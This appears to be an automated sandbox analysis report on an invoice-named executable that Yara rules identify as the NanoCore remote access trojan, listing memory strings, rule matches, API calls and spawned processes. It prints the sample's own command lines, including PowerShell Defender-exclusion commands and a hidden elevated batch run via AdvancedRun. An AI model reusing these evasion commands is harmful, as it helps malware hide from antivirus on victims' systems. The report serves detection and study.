        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
        Source: svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
        Source: svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
        Source: svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
        Source: svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
        Source: svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000012.00000003.288221774.000001F773232000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drString found in binary or memory: https://sectigo.com/CPS0C
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drString found in binary or memory: https://sectigo.com/CPS0D
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310709236.000001F773240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
        Source: svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Executable has a suspicious name (potential lure to open the executable)Show sources
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic file information: Suspicious name
        Initial sample is a PE file and has a suspicious nameShow sources
        Source: initial sampleStatic PE information: Filename: CN-Invoice-XXXXX9808-19011143287990.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_08396890 NtSetInformationThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_0839F13B NtSetInformationThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_0839F198 NtSetInformationThread,
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_008BCF8C
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_008BCF80
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_008BF030
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_008BD360
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_008BB71C
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_08370040
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_08398EB0
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_08370016
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_08398EA1
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: svchost.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534877445.0000000008320000.00000002.00000001.sdmpBinary or memory string: originalfilename vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534877445.0000000008320000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534487700.0000000008080000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000000.221983662.000000000008A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWgjnHXED.exe2 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDXGI QpV.exe2 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.527751547.0000000005B50000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exeBinary or memory string: OriginalFilenameWgjnHXED.exe2 vs CN-Invoice-XXXXX9808-19011143287990.exe
        Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: classification engineClassification label: mal100.troj.evad.winEXE@56/29@6/5
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5604
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{eccd15db-272a-41be-b8cd-5f3fef4189ce}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_01
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4Jump to behavior
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: CN-Invoice-XXXXX9808-19011143287990.exeReversingLabs: Detection: 25%
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: unknownProcess created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
